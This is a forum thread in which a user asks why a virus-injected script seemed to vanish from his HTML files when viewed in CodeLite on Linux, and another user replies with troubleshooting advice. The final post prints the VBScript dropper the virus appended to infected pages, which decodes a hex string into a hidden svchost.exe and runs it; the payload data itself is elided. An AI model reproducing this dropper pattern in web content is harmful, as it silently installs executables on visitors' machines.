CodeLite IDE

I have started using Linux because of a serious Virus issue that my Windows PC and McAfee let me down on. The Virus was a self replicating file infector that wrote itself to .exe .dll and html files. (I've never seen html virus's before!). It was serous as the virus opened a back door into the machine and the hard drive was flooded with other worms and nasty virus's. McAfee did spot these other intruders but they can quicker than they could be quarantined. After fighting for about 10 minutes I have no choice than to shut the system down and pull the drive.

I put the drive into my Linux box as a slave to start picking off the files I needed to rescue. I had already acknowledged that this would mean cleaning up several 100 html files for my web work. The virus wrote a VB script and a data string on the bottom of each html file.

I have now opened html files in Codelite on Ubuntu and the added script from the virus infector which was there when I looked on my Dell ... HAS GONE!

Now that leaves me thinking:
1. Is it still there and I just can't see it on this OS or this software?
or
2. Has the Linux OS disinfected the file? Although I can't see how.

Bit of a concern as at some point the file may end up back on a windows PC.

What are your thought please?

DavidH

Hi David,

Is it still there and I just can't see it on this OS or this software?

That's vanishingly unlikely. You say it was inserted into html files; I can't imagine how such an insertion would be hidden from an editor like CodeLite. However by all means check with other editors e.g. kwrite or gedit.

Has the Linux OS disinfected the file?

No. Linux is wonderful, but not that wonderful . The virus would only be actively removed from a file if you had run an antivirus package e.g. ClamAV, and it's unlikely that this would have happened spontaneously.

I'm no expert on windows viruses, but maybe the virus was inserting the malicious code into each html file as it was opened in the browser, rather than all of them on disc...

Regards,

David

Ah Ha!

I found it. Thanks for the reply.
I can't explain it but it had gone from a few files where I had seen it before and isn't present now. But I opened a folder (in Linux) of an old web project I had completed and it is still there. So as I suspected it seems the thing searches the drive looking for files to write to. Somehow has gone from my current work file I checked before; not sure why or how - but at least I know now I can see that it isn't there for sure.

If any programmer sort out there is interested the visual basic script planted at the bottom of each html looks like:

DropFileName = "svchost.exe"
WriteData = "massive long data string"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=True Then
FSO.DeleteFile(DropPath)
End If
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
End If
This is followed by a language string I don't understand or recognise looks like ¤»®|àÒ* Á*? but a whole load of it

Would like ten minutes alone in a locked room with the Ass who sent that out!!